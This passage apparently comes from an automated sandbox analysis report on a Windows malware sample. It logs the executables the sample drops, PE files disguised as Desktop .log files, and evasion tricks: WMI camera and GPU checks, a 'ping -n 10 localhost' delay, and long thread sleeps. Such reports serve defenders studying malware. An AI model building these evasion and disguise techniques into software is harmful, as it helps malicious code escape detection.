                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Windows\TAPI\ZWgKQlTqcrSB.exeJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\gBXkgMjS.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\ddkcuipI.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\gSeCuhdU.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\KUhOFMFy.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\kOfTBNTO.logJump to dropped file
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeFile created: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\IwSFjKJP.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\HRugjdAD.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\MBrWacSF.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\PybNxWBp.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\dBJtpdQc.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\RfmVTnPw.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\ATGgGOGO.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\GQyPcgoW.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\kJRJIbpu.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\EXjhrjDY.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\HNZYygDR.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\xAiiOWpY.logJump to dropped file

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Memory allocated: 1550000 memory reserve | memory write watch
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Memory allocated: 1B0C0000 memory reserve | memory write watch
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Memory allocated: 11A0000 memory reserve | memory write watch
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Memory allocated: 1ADA0000 memory reserve | memory write watch
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Thread delayed: delay time: 600000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Thread delayed: delay time: 3600000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Thread delayed: delay time: 300000
                          Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3515
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3535
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3489
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3392
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3262
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Window / User API: threadDelayed 7041
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe Window / User API: threadDelayed 2173
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eRokfvkG.log
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cXlUovHQ.log
